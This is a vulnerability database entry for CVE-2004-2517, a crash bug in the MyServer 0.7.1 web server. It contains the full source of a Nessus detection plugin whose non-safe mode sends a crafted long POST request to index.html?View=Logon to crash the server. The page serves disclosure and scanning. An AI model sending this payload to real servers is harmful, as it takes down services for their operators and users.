Vulnerabilities > CVE-2004-2517 - Unspecified vulnerability in Myserver 0.7.1

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
myserver
nessus
exploit available

Summary

myServer 0.7.1 allows remote attackers to cause a denial of service (crash) via a long HTTP POST request in a View=Logon operation to index.html.

Vulnerable Configurations

Part Description Count
Application
Myserver
1

Exploit-Db

descriptionMyServer 0.7.1 (POST) Denial Of Service Exploit. CVE-2004-2517. Dos exploit for linux platform
idEDB-ID:551
last seen2016-01-31
modified2004-09-27
published2004-09-27
reporterTom Ferris
sourcehttps://www.exploit-db.com/download/551/
titleMyServer 0.7.1 POST Denial of Service Exploit

Nessus

NASL familyWeb Servers
NASL idMYSERVER_POST_DOS.NASL
descriptionThe remote host is running MyServer, an open source web server. The installed version is vulnerable to remote denial of service attack. Using a specially crafted HTTP POST request to
last seen2020-06-01
modified2020-06-02
plugin id14838
published2004-09-28
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/14838
titleMyServer HTTP POST Request Remote Overflow DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(14838);
 script_version("1.16");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2004-2517");
 script_xref(name:"Secunia", value:"12640");

 script_name(english: "MyServer HTTP POST Request Remote Overflow DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is susceptible to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The remote host is running MyServer, an open source web server.  The
installed version is vulnerable to remote denial of service attack. 
Using a specially crafted HTTP POST request to 'index.html' when
'View' is set to 'Logon', an unauthenticated, remote attacker can cause
the server to stop responding." );
  # http://web.archive.org/web/20051016184445/http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt 
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?913eb7d4" );
 script_set_attribute(attribute:"see_also", value:"http://sourceforge.net/project/shownotes.php?release_id=270736" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to the MyServer version 0.7.2 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/09/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/09/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value: "cpe:/a:myserver:myserver");
script_end_attributes();

 script_summary(english: "Test POST DoS on MyServer");
 
 script_category(ACT_MIXED_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.");
 script_family(english: "Web Servers");
 
 script_dependencie("http_version.nasl", "www_too_long_url.nasl");
 script_exclude_keys("www/too_long_url_crash");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("http_func.inc");

port = get_http_port(default:80, embedded:TRUE);

if(get_port_state(port))
{
 banner = get_http_banner(port:port);
 if(!banner) exit(0);
 if ( "MyServer" >!< banner ) exit(0);

 if (safe_checks())
 {
 	#Server: MyServer 0.7.1
 	if(egrep(pattern:"^Server: *MyServer 0\.([0-6]\.|7\.[0-1])[^0-9]", string:banner))
        {
          security_warning(port);
        }
   exit(0);
 }
 else
 {
   if(http_is_dead(port:port))exit(0);
   data = http_post(item:string("index.html?View=Logon HTTP/1.1\r\n", crap(520), ": ihack.ms\r\n\r\n"), port:port); 
   soc = http_open_socket(port);
   if(soc > 0)
   {
    send(socket:soc, data:data);
    http_close_socket(soc);
    sleep(1);
    soc2 = http_open_socket(port);
    if(!soc2)
    {
	security_warning(port);
    }
    else http_close_socket(soc2);
   }
 }
}